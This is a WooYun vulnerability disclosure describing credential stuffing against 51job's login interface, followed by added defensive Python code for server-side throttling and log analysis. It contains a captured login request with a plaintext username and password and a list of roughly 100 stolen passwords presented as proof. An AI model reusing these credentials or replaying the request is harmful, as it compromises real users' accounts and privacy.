
Vulnerability summary

Defect ID: wooyun-2015-0110998

Title: Credential stuffing against a 51job (前程无忧) login interface leaks users' login credentials (batch of accounts as proof)

Vendor: 前程无忧 (51job)

Author: 路人甲

Submitted: 2015-04-29 10:43

Fixed: 2015-06-17 15:26

Published: 2015-06-17 15:26

Vulnerability type: design flaw / logic error

Severity: high

Self-assessed Rank: 18

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-29: details sent to the vendor, awaiting the vendor's response
2015-05-03: vendor confirmed; details disclosed to the vendor only
2015-05-13: details disclosed to core white hats and domain experts
2015-05-23: details disclosed to ordinary white hats
2015-06-02: details disclosed to intern white hats
2015-06-17: details disclosed to the public

Brief description:

Credential-stuffing (account-enumeration) attacks are already one of the Top 10 Security Risks for 2014. Credential stuffing builds on large volumes of leaked user data and exploits users' habit of registering everywhere with the same username and password, replaying those pairs against other sites. The 2011 wave of Internet password leaks shook the whole information-security community and showed that traditional username+password authentication no longer meets current security needs. The leaked data included: Tianya 31,758,468 records, CSDN 6,428,559, Weibo 4,442,915, Renren 4,445,047, Mop 2,644,726, 178 9,072,819, Duduniu 13,891,418, 7K7K 18,282,404, about 120 million records in total. However well a site protects its own passwords, against credentials that have already leaked a defence against credential stuffing remains an essential layer.

Detailed description:

The main-site login interface has no defence against credential stuffing: calls to the login interface are not rate-limited. Testing showed that a certain leaked database could be replayed against it to obtain a large number of valid login accounts. A captcha appears only after repeated failures on a single account, and because that state lives in the cookie, deleting the cookie removes even that, so stuffing can proceed. The captured login request is:

POST /47107315565447156545/my/My_Pmc.php HTTP/1.1
Host: mylogin.51job.com
Connection: close
Content-Length: 77
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://my.51job.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://my.51job.com/my/My_SignIn.php?url=&errmsg=UserNameOrPwdError
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:
RA-Ver: 2.10.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
username=xw@mail%2ezhongxing%2ecom&userpwd=david&login_verify=&url=&x=52&y=26


Proof of vulnerability:

Testing showed that a certain leaked database could be replayed against the interface to obtain a large number of valid login accounts.
The success rate is frighteningly high; there really are a lot of users...

[email protected] 5128752
[email protected] inform
[email protected] sysop123
[email protected] 5418866
[email protected] loginlsd
[email protected] 730413
[email protected] 771111
[email protected] hyxb-420
[email protected] agnes212
[email protected] infoweb
[email protected] sineysoft
[email protected] caoyijie
[email protected] 1414gyxf
[email protected] wangmickey
[email protected] comtech
[email protected] 44476090
[email protected] love
[email protected] 900267
[email protected] 101112
[email protected] 888999
[email protected] 838980
[email protected] 19760502
[email protected] zrbzrb
[email protected] 19770412
[email protected] twsystem
[email protected] zhouyuan
[email protected] explorer
[email protected] bugadmin
[email protected] 720705
[email protected] 987773
[email protected] 83624585
[email protected] 19760108
[email protected] 19800229
[email protected] wangjian
[email protected] 780122
[email protected] 452570
[email protected] priverhe
[email protected] 073011
[email protected] rose
[email protected] yulingkong!!
[email protected] gao1218
[email protected] xinmen
[email protected] 970820
[email protected] 95421139
[email protected] zq1972
[email protected] seastar
[email protected] 537226
[email protected] kingdom
[email protected] 1125007
[email protected] 741112
[email protected] sapling
[email protected] wapeka
[email protected] 197936
[email protected] 343161
[email protected] 001128
[email protected] zch1725
[email protected] 666666
[email protected] zhczhc
[email protected] alixon1973
[email protected] 770503
[email protected] abc123
[email protected] yhch
[email protected] 751211
[email protected] 077225
[email protected] 322104
[email protected] mimibar
[email protected] 101112
[email protected] a7v5b4
[email protected] 9394167
[email protected] 771220
[email protected] ghp4lily
[email protected] bencompu
[email protected] annie
[email protected] 19733288
[email protected] mt1hy9bh
[email protected] 953232
[email protected] 117111
[email protected] fjz78509
[email protected] 1975
[email protected] lcp978331
[email protected] yp781012
[email protected] 650005
[email protected] afxapi
[email protected] softgirl718
[email protected] congjun
[email protected] admin123
[email protected] shen
[email protected] 00000
[email protected] 771209
[email protected] 123456
[email protected] liu0615
[email protected] config
[email protected] anthony
[email protected] 730313
[email protected] dvlpment
[email protected] chf1973
[email protected] 26418725
[email protected] 277000
[email protected] fuckyou
[email protected] david
[email protected] 19760527
[email protected] smart1010
[email protected] flycat
[email protected] syl416


[Screenshot: 屏幕快照 2015-04-29 上午9.42.37.png]

Fix suggestion:

Reference material on defending against credential stuffing: http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/
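The two gaps the report describes (no limit on calls to the login interface, and a captcha that is triggered only per account and is forgotten as soon as the cookie is deleted) map directly onto a server-side throttle. The Python below is an added example written for this page; it is not 51job's code and not the linked reference, and its thresholds, log format and names are assumptions. It keeps failure counts per account and per source IP on the server, demands a captcha once one IP cycles through many usernames regardless of cookies, and includes a retrospective check over constructed auth-log lines for the same pattern.

```python
"""Server-side credential-stuffing controls, as an added example.

Two things the report describes: a captcha triggered only per account and
remembered in a cookie is bypassed by clearing the cookie and rotating
usernames; a throttle keyed on the source IP as well as the account, with
state held server-side, closes that gap. The thresholds, log format and
names here are assumptions for this example, not 51job's implementation.
"""
from collections import defaultdict, deque

WINDOW_SECONDS = 600        # sliding window over which failures are counted
ACCOUNT_FAIL_LIMIT = 3      # failures on one account before a captcha is demanded
IP_FAIL_LIMIT = 10          # failures from one IP before a captcha is demanded
IP_DISTINCT_USER_LIMIT = 5  # distinct usernames tried from one IP: stuffing signature


class LoginThrottle:
    """Failure tracking that lives on the server; no client cookie is consulted."""

    def __init__(self):
        self.account_fail = defaultdict(deque)  # username -> failure timestamps
        self.ip_fail = defaultdict(deque)       # ip -> failure timestamps
        self.ip_users = defaultdict(dict)       # ip -> {username: last attempt time}

    @staticmethod
    def _prune(dq, now):
        while dq and now - dq[0] > WINDOW_SECONDS:
            dq.popleft()

    def captcha_required(self, ip, username, now):
        """Decide, before the password is even checked, whether to demand a captcha."""
        self._prune(self.account_fail[username], now)
        self._prune(self.ip_fail[ip], now)
        seen = self.ip_users[ip]
        for user, t in list(seen.items()):
            if now - t > WINDOW_SECONDS:
                del seen[user]
        return (len(self.account_fail[username]) >= ACCOUNT_FAIL_LIMIT
                or len(self.ip_fail[ip]) >= IP_FAIL_LIMIT
                or len(seen) >= IP_DISTINCT_USER_LIMIT)

    def record(self, ip, username, success, now):
        """Record the outcome of an attempt that was allowed through."""
        self.ip_users[ip][username] = now
        if not success:
            self.account_fail[username].append(now)
            self.ip_fail[ip].append(now)


def simulate_stuffing(throttle, ip, pairs, start=0):
    """Replay constructed (username, password) guesses from one IP, one per second,
    each with a fresh cookie (so no client-side state survives between attempts).
    Every guess is wrong; returns how many attempts were met with a captcha."""
    challenged = 0
    for i, (user, _pwd) in enumerate(pairs):
        now = start + i
        if throttle.captcha_required(ip, user, now):
            challenged += 1
            continue  # the server serves a captcha instead of checking the password
        throttle.record(ip, user, success=False, now=now)
    return challenged


# Constructed auth-log lines, "<epoch> <ip> <username> <OK|FAIL>", for the
# retrospective check below (documentation IP ranges, invented usernames).
SAMPLE_LOG = """\
1430271600 203.0.113.7 ann FAIL
1430271601 203.0.113.7 bob FAIL
1430271602 203.0.113.7 cy FAIL
1430271603 203.0.113.7 dan FAIL
1430271604 203.0.113.7 eve FAIL
1430271605 203.0.113.7 fay OK
1430271610 192.0.2.10 ann FAIL
1430271620 192.0.2.10 ann OK
"""


def find_stuffing_sources(log_text, distinct_users=IP_DISTINCT_USER_LIMIT, fail_ratio=0.8):
    """Return IPs that tried many distinct usernames with mostly failures:
    the pattern a per-account captcha cannot see but an IP-keyed view can."""
    users, fails, total = defaultdict(set), defaultdict(int), defaultdict(int)
    for line in log_text.splitlines():
        _ts, ip, user, result = line.split()
        users[ip].add(user)
        total[ip] += 1
        if result == "FAIL":
            fails[ip] += 1
    return sorted(ip for ip in users
                  if len(users[ip]) >= distinct_users and fails[ip] / total[ip] >= fail_ratio)


if __name__ == "__main__":
    guesses = [(f"user{i}@example.invalid", "123456") for i in range(8)]
    print("captchas served to a rotating-username attacker:",
          simulate_stuffing(LoginThrottle(), "198.51.100.9", guesses))
    print("suspicious sources in the sample log:", find_stuffing_sources(SAMPLE_LOG))
```

With the per-account rule alone, the rotating-username replay in `simulate_stuffing` would never see a captcha, which is exactly the behaviour the report observed; the IP-keyed distinct-username rule is what stops it after the fifth account. In production the counters would sit in a shared store such as Redis rather than in-process dictionaries, and the thresholds would be tuned against real traffic, but the keying decision (account and source, never the cookie) is the part that matters.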

Copyright notice: when republishing, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: medium

Vulnerability Rank: 10

Confirmed: 2015-05-03 15:25

Vendor reply:

Thanks for the feedback

Latest status:

None yet